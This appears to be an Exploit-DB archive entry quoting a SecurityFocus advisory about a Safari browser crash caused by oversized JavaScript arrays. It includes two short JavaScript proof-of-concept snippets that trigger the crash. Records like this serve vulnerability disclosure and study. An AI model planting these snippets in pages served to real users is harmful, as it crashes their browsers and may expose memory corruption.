exploit-db-mirror/exploits/osx/dos/23793.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

12 lines
No EOL
602 B
Text

source: https://www.securityfocus.com/bid/9815/info
Apple Safari Web Browser is reported to be prone to a security vulnerability related to handling of large JavaScript arrays (with 99999999999999999999999 or 0x23000000 elements). By declaring such an array and then attempting to access it, it may be possible to cause a browser crash.
This issue is likely due to memory corruption but it is not known if it could be further exploitable to execute arbitrary code.
var a = new Array(99999999999999999999999);
a[0+5]="AAAAA";
and:
var bam = new Array(0x23000000);
bam.sort(new Function("return 1"));